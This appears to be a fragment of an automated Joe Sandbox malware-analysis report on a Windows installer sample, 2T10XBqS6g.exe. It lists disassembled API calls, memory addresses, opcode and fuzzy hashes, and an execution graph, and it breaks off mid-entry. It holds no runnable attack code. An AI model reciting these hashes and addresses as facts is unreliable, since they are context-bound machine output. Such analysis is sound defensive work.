                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb3903.tmp
                                                                                                                                                                                                                                    • API String ID: 2962429428-3885914009
                                                                                                                                                                                                                                    • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                                                                                                                                                                                    • Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,?,0000000A,?), ref: 0040668F
                                                                                                                                                                                                                                      • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 0040600A
                                                                                                                                                                                                                                      • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                                                                                                                                                                                      • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 004060B2
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0), ref: 004060C2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsb3903.tmp
                                                                                                                                                                                                                                    • API String ID: 3248276644-3692555289
                                                                                                                                                                                                                                    • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                                                                                                                                                                                    • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004056AA
                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                                                                                                                                                                                                      • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                    • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                                                                                                                                                                                    • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                                                                    • String ID: Call
                                                                                                                                                                                                                                    • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                    • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                                                                                                                                                                                    • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2T10XBqS6g.exe,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 00405FA3
                                                                                                                                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2T10XBqS6g.exe,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 00405FB3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                    • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                    • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                                                                    • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                                    • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                                                                                                                    • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:4.4%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                    Signature Coverage:1.3%
                                                                                                                                                                                                                                    Total number of Nodes:1653
                                                                                                                                                                                                                                    Total number of Limit Nodes:20
                                                                                                                                                                                                                                    execution_graph 6265 33a321a1 6268 33a32418 6265->6268 6270 33a32420 6268->6270 6272 33a347f5 6270->6272 6271 33a321bc 6273 33a34804 6272->6273 6274 33a34808 6272->6274 6273->6271 6277 33a34815 6274->6277 6278 33a35b7a 20 API calls 6277->6278 6281 33a3482c 6278->6281 6279 33a32ada 5 API calls 6280 33a34811 6279->6280 6280->6271 6281->6279 6282 33a381a0 6283 33a381d9 6282->6283 6284 33a381dd 6283->6284 6295 33a38205 6283->6295 6285 33a36368 20 API calls 6284->6285 6286 33a381e2 6285->6286 6296 33a362ac 6286->6296 6287 33a38529 6289 33a32ada 5 API calls 6287->6289 6291 33a38536 6289->6291 6292 33a32ada 5 API calls 6294 33a381f9 6292->6294 6295->6287 6299 33a380c0 6295->6299 6303 33a36231 6296->6303 6298 33a362b8 6298->6292 6300 33a380db 6299->6300 6301 33a32ada 5 API calls 6300->6301 6302 33a38152 6301->6302 6302->6295 6304 33a35b7a 20 API calls 6303->6304 6305 33a36247 6304->6305 6306 33a362a6 6305->6306 6308 33a36255 6305->6308 6314 33a362bc IsProcessorFeaturePresent 6306->6314 6312 33a32ada 5 API calls 6308->6312 6309 33a362ab 6310 33a36231 26 API calls 6309->6310 6311 33a362b8 6310->6311 6311->6298 6313 33a3627c 6312->6313 6313->6298 6315 33a362c7 6314->6315 6318 33a360e2 6315->6318 6319 33a360fe 6318->6319 6320 33a3612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6319->6320 6323 33a361fb 6320->6323 6321 33a32ada 5 API calls 6322 33a36219 GetCurrentProcess TerminateProcess 6321->6322 6322->6309 6323->6321 6830 33a3a1e0 6833 33a3a1fe 6830->6833 6832 33a3a1f6 6837 33a3a203 6833->6837 6836 33a3a298 6836->6832 6837->6836 6838 33a3aa53 6837->6838 6839 33a3aa80 6838->6839 6840 33a3aa70 RtlDecodePointer 6838->6840 6841 33a3ab02 6839->6841 6844 33a3ab0d 6839->6844 6846 33a3aab7 6839->6846 6840->6839 6842 33a32ada 5 API calls 6841->6842 6843 33a3a42f 6842->6843 6843->6832 6844->6841 6845 33a36368 20 API calls 6844->6845 6845->6841 6846->6841 6847 33a36368 20 API calls 6846->6847 6847->6841 7123 33a37260 GetStartupInfoW 7124 33a37286 7123->7124 7125 33a37318 7123->7125 7124->7125 7126 33a38be3 27 API calls 7124->7126 7127 33a372af 7126->7127 7127->7125 7128 33a372dd GetFileType 7127->7128 7128->7127 7069 33a3742b 7070 33a37430 7069->7070 7072 33a37453 7070->7072 7073 33a38bae 7070->7073 7074 33a38bdd 7073->7074 7075 33a38bbb 7073->7075 7074->7070 7076 33a38bd7 7075->7076 7077 33a38bc9 RtlDeleteCriticalSection 7075->7077 7078 33a3571e 20 API calls 7076->7078 7077->7076 7077->7077 7078->7074 7129 33a39e6b 7130 33a39e7d 7129->7130 7132 33a3ac6b 7129->7132 7131 33a39eae 7130->7131 7130->7132 7133 33a3aa53 21 API calls 7131->7133 7135 33a39ef8 7131->7135 7136 33a3acad 7132->7136 7137 33a3b2f0 7132->7137 7133->7135 7138 33a3b329 7137->7138 7140 33a3b350 7138->7140 7148 33a3b5c1 7138->7148 7141 33a3b393 7140->7141 7142 33a3b36e 7140->7142 7161 33a3b8b2 7141->7161 7152 33a3b8e1 7142->7152 7145 33a3b38e 7146 33a32ada 5 API calls 7145->7146 7147 33a3b3b7 7146->7147 7147->7136 7149 33a3b5ec 7148->7149 7150 33a3b7e5 RaiseException 7149->7150 7151 33a3b7fd 7150->7151 7151->7140 7153 33a3b8f0 7152->7153 7154 33a3b964 7153->7154 7155 33a3b90f 7153->7155 7157 33a3b8b2 20 API calls 7154->7157 7168 33a378a3 7155->7168 7160 33a3b95d 7157->7160 7159 33a3b8b2 20 API calls 7159->7160 7160->7145 7162 33a3b8d4 7161->7162 7163 33a3b8bf 7161->7163 7165 33a36368 20 API calls 7162->7165 7164 33a3b8d9 7163->7164 7166 33a36368 20 API calls 7163->7166 7164->7145 7165->7164 7167 33a3b8cc 7166->7167 7167->7145 7170 33a378cb 7168->7170 7169 33a32ada 5 API calls 7171 33a378e8 7169->7171 7170->7169 7171->7159 7171->7160 7172 33a3ac6b 7173 33a3ac84 7172->7173 7174 33a3b2f0 21 API calls 7173->7174 7175 33a3acad 7173->7175 7174->7175 7176 33a3506f 7177 33a35081 7176->7177 7179 33a35087 7176->7179 7178 33a35000 20 API calls 7177->7178 7178->7179 6324 33a360ac 6325 33a360dd 6324->6325 6327 33a360b7 6324->6327 6326 33a360c7 FreeLibrary 6326->6327 6327->6325 6327->6326 6328 33a33eb3 6331 33a35411 6328->6331 6332 33a3541d 6331->6332 6337 33a35af6 GetLastError 6332->6337 6336 33a35422 6357 33a355a8 6336->6357 6338 33a35b0c 6337->6338 6341 33a35b12 6337->6341 6339 33a35e08 11 API calls 6338->6339 6339->6341 6340 33a3637b 20 API calls 6342 33a35b24 6340->6342 6341->6340 6343 33a35b61 SetLastError 6341->6343 6344 33a35b2c 6342->6344 6345 33a35e5e 11 API calls 6342->6345 6343->6336 6347 33a3571e 20 API calls 6344->6347 6346 33a35b41 6345->6346 6346->6344 6348 33a35b48 6346->6348 6349 33a35b32 6347->6349 6350 33a3593c 20 API calls 6348->6350 6351 33a35b6d SetLastError 6349->6351 6352 33a35b53 6350->6352 6353 33a355a8 35 API calls 6351->6353 6354 33a3571e 20 API calls 6352->6354 6355 33a35b79 6353->6355 6356 33a35b5a 6354->6356 6356->6343 6356->6351 6368 33a37613 6357->6368 6360 33a355b8 6362 33a355e0 6360->6362 6363 33a355c2 IsProcessorFeaturePresent 6360->6363 6398 33a34bc1 6362->6398 6364 33a355cd 6363->6364 6366 33a360e2 8 API calls 6364->6366 6366->6362 6401 33a37581 6368->6401 6371 33a3766e 6372 33a3767a 6371->6372 6373 33a35b7a 20 API calls 6372->6373 6378 33a376a7 6372->6378 6379 33a376a1 6372->6379 6373->6379 6374 33a376f3 6376 33a36368 20 API calls 6374->6376 6375 33a376d6 6381 33a3bdc9 5 API calls 6375->6381 6377 33a376f8 6376->6377 6380 33a362ac 26 API calls 6377->6380 6384 33a3771f 6378->6384 6415 33a35671 RtlEnterCriticalSection 6378->6415 6379->6374 6379->6375 6379->6378 6380->6375 6382 33a37875 6381->6382 6382->6360 6385 33a3777e 6384->6385 6387 33a37776 6384->6387 6396 33a377a9 6384->6396 6416 33a356b9 RtlLeaveCriticalSection 6384->6416 6385->6396 6417 33a37665 6385->6417 6390 33a34bc1 28 API calls 6387->6390 6390->6385 6392 33a35af6 38 API calls 6395 33a3780c 6392->6395 6394 33a37665 38 API calls 6394->6396 6395->6375 6397 33a35af6 38 API calls 6395->6397 6420 33a3782e 6396->6420 6397->6375 6399 33a3499b 28 API calls 6398->6399 6400 33a34bd2 6399->6400 6404 33a37527 6401->6404 6403 33a355ad 6403->6360 6403->6371 6405 33a37533 6404->6405 6410 33a35671 RtlEnterCriticalSection 6405->6410 6407 33a37541 6411 33a37575 6407->6411 6409 33a37568 6409->6403 6410->6407 6414 33a356b9 RtlLeaveCriticalSection 6411->6414 6413 33a3757f 6413->6409 6414->6413 6415->6384 6416->6387 6418 33a35af6 38 API calls 6417->6418 6419 33a3766a 6418->6419 6419->6394 6421 33a37834 6420->6421 6422 33a377fd 6420->6422 6424 33a356b9 RtlLeaveCriticalSection 6421->6424 6422->6375 6422->6392 6422->6395 6424->6422 7079 33a3af31 CreateFileW 6848 33a363f0 6849 33a36400 6848->6849 6850 33a36416 6848->6850 6851 33a36368 20 API calls 6849->6851 6860 33a36561 6850->6860 6862 33a36480 6850->6862 6867 33a36580 6850->6867 6852 33a36405 6851->6852 6854 33a362ac 26 API calls 6852->6854 6855 33a3640f 6854->6855 6857 33a364ee 6859 33a3571e 20 API calls 6857->6859 6858 33a364e5 6858->6857 6864 33a36573 6858->6864 6884 33a385eb 6858->6884 6859->6860 6893 33a3679a 6860->6893 6878 33a34e76 6862->6878 6865 33a362bc 11 API calls 6864->6865 6866 33a3657f 6865->6866 6868 33a3658c 6867->6868 6868->6868 6869 33a3637b 20 API calls 6868->6869 6870 33a365ba 6869->6870 6871 33a385eb 26 API calls 6870->6871 6872 33a365e6 6871->6872 6873 33a362bc 11 API calls 6872->6873 6874 33a36615 6873->6874 6875 33a366b6 FindFirstFileExA 6874->6875 6876 33a36705 6875->6876 6877 33a36580 26 API calls 6876->6877 6879 33a34e87 6878->6879 6880 33a34e8b 6878->6880 6879->6858 6880->6879 6881 33a3637b 20 API calls 6880->6881 6882 33a34eb9 6881->6882 6883 33a3571e 20 API calls 6882->6883 6883->6879 6887 33a3853a 6884->6887 6885 33a3854f 6886 33a38554 6885->6886 6888 33a36368 20 API calls 6885->6888 6886->6858 6887->6885 6887->6886 6891 33a3858b 6887->6891 6889 33a3857a 6888->6889 6890 33a362ac 26 API calls 6889->6890 6890->6886 6891->6886 6892 33a36368 20 API calls 6891->6892 6892->6889 6894 33a367a4 6893->6894 6895 33a367b4 6894->6895 6896 33a3571e 20 API calls 6894->6896 6897 33a3571e 20 API calls 6895->6897 6896->6894 6898 33a367bb 6897->6898 6898->6855 7080 33a35630 7081 33a3563b 7080->7081 7082 33a35eb7 11 API calls 7081->7082 7083 33a35664 7081->7083 7085 33a35660 7081->7085 7082->7081 7086 33a35688 7083->7086 7087 33a356b4 7086->7087 7088 33a35695 7086->7088 7087->7085 7089 33a3569f RtlDeleteCriticalSection 7088->7089 7089->7087 7089->7089 7180 33a33370 7191 33a33330 7180->7191 7192 33a33342 7191->7192 7193 33a3334f 7191->7193 7194 33a32ada 5 API calls 7192->7194 7194->7193 6429 33a367bf 6434 33a367f4 6429->6434 6432 33a367db 6433 33a3571e 20 API calls 6433->6432 6435 33a367cd 6434->6435 6436 33a36806 6434->6436 6435->6432 6435->6433 6437 33a36836 6436->6437 6438 33a3680b 6436->6438 6437->6435 6445 33a371d6 6437->6445 6439 33a3637b 20 API calls 6438->6439 6440 33a36814 6439->6440 6442 33a3571e 20 API calls 6440->6442 6442->6435 6443 33a36851 6444 33a3571e 20 API calls 6443->6444 6444->6435 6446 33a371e1 6445->6446 6447 33a37209 6446->6447 6448 33a371fa 6446->6448 6449 33a37218 6447->6449 6454 33a38a98 6447->6454 6450 33a36368 20 API calls 6448->6450 6461 33a38acb 6449->6461 6453 33a371ff 6450->6453 6453->6443 6455 33a38aa3 6454->6455 6456 33a38ab8 RtlSizeHeap 6454->6456 6457 33a36368 20 API calls 6455->6457 6456->6449 6458 33a38aa8 6457->6458 6459 33a362ac 26 API calls 6458->6459 6460 33a38ab3 6459->6460 6460->6449 6462 33a38ae3 6461->6462 6463 33a38ad8 6461->6463 6464 33a38aeb 6462->6464 6472 33a38af4 6462->6472 6473 33a356d0 6463->6473 6466 33a3571e 20 API calls 6464->6466 6469 33a38ae0 6466->6469 6467 33a38af9 6470 33a36368 20 API calls 6467->6470 6468 33a38b1e RtlReAllocateHeap 6468->6469 6468->6472 6469->6453 6470->6469 6471 33a3474f 7 API calls 6471->6472 6472->6467 6472->6468 6472->6471 6474 33a3570e 6473->6474 6478 33a356de 6473->6478 6475 33a36368 20 API calls 6474->6475 6477 33a3570c 6475->6477 6476 33a356f9 RtlAllocateHeap 6476->6477 6476->6478 6477->6469 6478->6474 6478->6476 6479 33a3474f 7 API calls 6478->6479 6479->6478 6899 33a35bff 6907 33a35d5c 6899->6907 6902 33a35c13 6903 33a35b7a 20 API calls 6904 33a35c1b 6903->6904 6905 33a35c28 6904->6905 6906 33a35c2b 11 API calls 6904->6906 6906->6902 6908 33a35c45 5 API calls 6907->6908 6909 33a35d83 6908->6909 6910 33a35d9b TlsAlloc 6909->6910 6911 33a35d8c 6909->6911 6910->6911 6912 33a32ada 5 API calls 6911->6912 6913 33a35c09 6912->6913 6913->6902 6913->6903 7090 33a3543d 7091 33a35440 7090->7091 7092 33a355a8 38 API calls 7091->7092 7093 33a3544c 7092->7093 7094 33a35303 7097 33a350a5 7094->7097 7106 33a3502f 7097->7106 7100 33a3502f 5 API calls 7101 33a350c3 7100->7101 7102 33a35000 20 API calls 7101->7102 7103 33a350ce 7102->7103 7104 33a35000 20 API calls 7103->7104 7105 33a350d9 7104->7105 7109 33a35048 7106->7109 7107 33a32ada 5 API calls 7108 33a35069 7107->7108 7108->7100 7109->7107 7110 33a37103 GetCommandLineA GetCommandLineW 7195 33a3af43 7196 33a3af59 7195->7196 7197 33a3af4d 7195->7197 7197->7196 7198 33a3af52 CloseHandle 7197->7198 7198->7196 6480 33a37a80 6481 33a37a8d 6480->6481 6482 33a3637b 20 API calls 6481->6482 6483 33a37aa7 6482->6483 6484 33a3571e 20 API calls 6483->6484 6485 33a37ab3 6484->6485 6486 33a3637b 20 API calls 6485->6486 6489 33a37ad9 6485->6489 6488 